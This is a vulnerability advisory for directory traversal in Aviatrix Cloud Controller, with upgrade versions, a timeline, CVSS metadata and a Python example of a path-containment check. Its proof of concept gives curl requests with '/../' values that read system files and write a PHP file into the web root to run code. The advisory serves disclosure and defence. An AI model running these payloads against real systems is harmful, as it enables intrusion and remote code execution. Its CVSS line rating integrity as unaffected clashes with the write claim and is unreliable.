Advisory

Directory traversal in Aviatrix allows an authenticated user to read and write to any file

Overview

Aviatrix Cloud Controller includes multiple APIs that, by design, accept file uploads from authenticated users. Some of these APIs do not adequately sanitise their input, allowing an attacker to construct a pathname that resolves outside the intended upload directory. The writable locations include directories under the web root, which allows an attacker to upload and then run code of their choosing.

Proof of concept

  1. Log into Aviatrix to obtain a CID token. This is sent in the response to the login_proc action, and used in most API calls.
$ curl -k https://aviatrix/v1/backend1 -d action=login_proc -d "username=Test User" -d "password=Password"
  2. Using the CID, make the following request, which will read a file from /tmp. On recent versions (after January 2021), replace the path with /../../../var/www/build_info:
curl -k https://aviatrix/v1/backend1 -d CID=ZyGaXCfPI20XD4x5MIY9 -d action=get_metric_gw_selections -d account_name=/../../../../../tmp/build_info
  3. Make the following request, which will create a file in /var/www/php/downloads. This directory is not protected by a .htaccess file.
curl -k https://aviatrix/v1/backend1 -d CID=ZyGaXCfPI20XD4x5MIY9 -d action=set_metric_gw_selections -d account_name=/../../downloads/test.php -d data="hello<?php phpinfo()?>"
  4. Visit https://aviatrix/v1/downloads/test.php, which will show the PHP version information.
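The defect behind this advisory is a caller-supplied name appended to the upload directory without a containment check. The following is an added Python example, not Aviatrix code, showing that concatenation pattern beside a check on the resolved real path; the upload directory is an assumed placeholder, and the two traversal values are the ones from the proof of concept above.

```python
import os

# Assumed upload directory: a placeholder, not a path taken from the product.
UPLOAD_DIR = "/var/www/php/metrics"


def vulnerable_path(base: str, name: str) -> str:
    """The pattern the advisory describes: the client-supplied name is simply
    appended to the upload directory, so '/../' segments walk out of it."""
    return os.path.normpath(base + "/" + name)


def safe_path(base: str, name: str):
    """Resolve name under base and return the absolute path, or None when the
    result would land outside base (traversal, absolute path, symlink escape)."""
    if not name or "\x00" in name:
        return None
    root = os.path.realpath(base)
    # realpath collapses '..' and follows symlinks, so the containment check is
    # made on the real target rather than on the string the client sent.
    candidate = os.path.realpath(os.path.join(root, name))
    # commonpath rejects prefix tricks such as '/var/www/php/metrics2/x' as well.
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


def is_contained(base: str, name: str) -> bool:
    return safe_path(base, name) is not None


# Constructed inputs: the two traversal values from the proof of concept above
# and one benign file name, with the containment result a defender expects.
SAMPLES = {
    "/../../downloads/test.php": False,
    "/../../../../../tmp/build_info": False,
    "gw_selection.json": True,
}

if __name__ == "__main__":
    for name, expected in SAMPLES.items():
        print(f"{name!r}: concatenation -> {vulnerable_path(UPLOAD_DIR, name)}, "
              f"contained -> {is_contained(UPLOAD_DIR, name)} (expected {expected})")
```

The same containment rule applied to the read API closes the file-disclosure path in step 2, since `safe_path` returns None for the /tmp value as well as the web-root one.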

Mitigation/further actions

Upgrade to one of the following versions:

  • UserConnect-6.2-1804.2043 or later
  • UserConnect-6.3-1804.2490 or later
  • UserConnect-6.4-1804.2838 or later
  • UserConnect-6.5-1804.1922 or later

Advisory timeline

  1. 2021-04-20: Discovered
  2. 2021-08-24: Reported to Aviatrix security team
  3. 2021-08-26: Aviatrix security team confirms the vulnerability will be fixed in a forthcoming release
  4. 2021-09-11: Fix released

CVSS

Base score: 6.8
Attack vector: Network
Attack complexity: Low
Privileges required: High
User interaction: None
Scope: Changed
Confidentiality: High
Integrity: None
Availability: None

Metadata

  • Severity
    Medium (base score 6.8)
  • Discovered by
    Glyn Wintle
  • Advisory ID
    tc-2021-0003
  • CVE
    (CVE not assigned)
  • Component/package
    Cloud Controller
  • Version
    022021 (2021-05-10, R6.4.2499)
  • Published
    2021-08-24